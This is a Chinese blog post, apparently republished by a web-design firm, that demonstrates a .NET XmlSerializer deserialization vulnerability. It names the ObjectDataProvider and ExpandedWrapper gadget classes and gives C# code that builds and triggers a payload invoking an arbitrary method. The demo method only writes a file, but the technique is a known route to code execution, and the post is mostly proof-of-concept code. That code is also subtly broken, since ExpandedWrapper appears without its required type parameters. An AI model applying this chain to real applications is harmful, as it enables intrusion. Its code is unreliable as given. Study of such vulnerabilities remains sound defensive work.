.Net反序列化漏洞XmlSerializer的示例分析

小编今天带大家了解.Net反序列化漏洞XmlSerializer的示例分析,文中知识点介绍的非常详细。觉得有帮助的朋友可以跟着小编一起浏览文章的内容,希望能够帮助更多想解决这个问题的朋友找到问题的答案,下面跟着小编一起深入学习“.Net反序列化漏洞XmlSerializer的示例分析”的知识吧。

创新互联主营四平网站建设的网络公司,主营网站建设方案,成都APP应用开发,四平h5小程序开发搭建,四平网站营销推广欢迎四平等地区企业咨询

条件:

  1. 初始化对象时,类型可控:new XmlSerializer(type可控)

  2. 反序列化对象时,输入内容可控:serializer.Deserialize(fi可控)

两个关键类:ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

Payload生成:

        public static void serializeObjectWithXmlSer()
        {
            ExpandedWrapper eobj = new ExpandedWrapper();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();
            eobj.ProjectedProperty0.MethodName = "writeFile";
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
            serializer.Serialize(fo, eobj);
            fo.Close();
        }

触发Payload:

        public static void deserializeObjectWithXmlSer()
        {
            XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper));
            TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
            ser.Deserialize(fi);
            fi.Close();
        }

感谢大家的阅读,以上就是“.Net反序列化漏洞XmlSerializer的示例分析”的全部内容了,学会的朋友赶紧操作起来吧。相信创新互联小编一定会给大家带来更优质的文章。谢谢大家对创新互联网站的支持!


当前标题:.Net反序列化漏洞XmlSerializer的示例分析
本文网址:http://scyanting.com/article/jopoej.html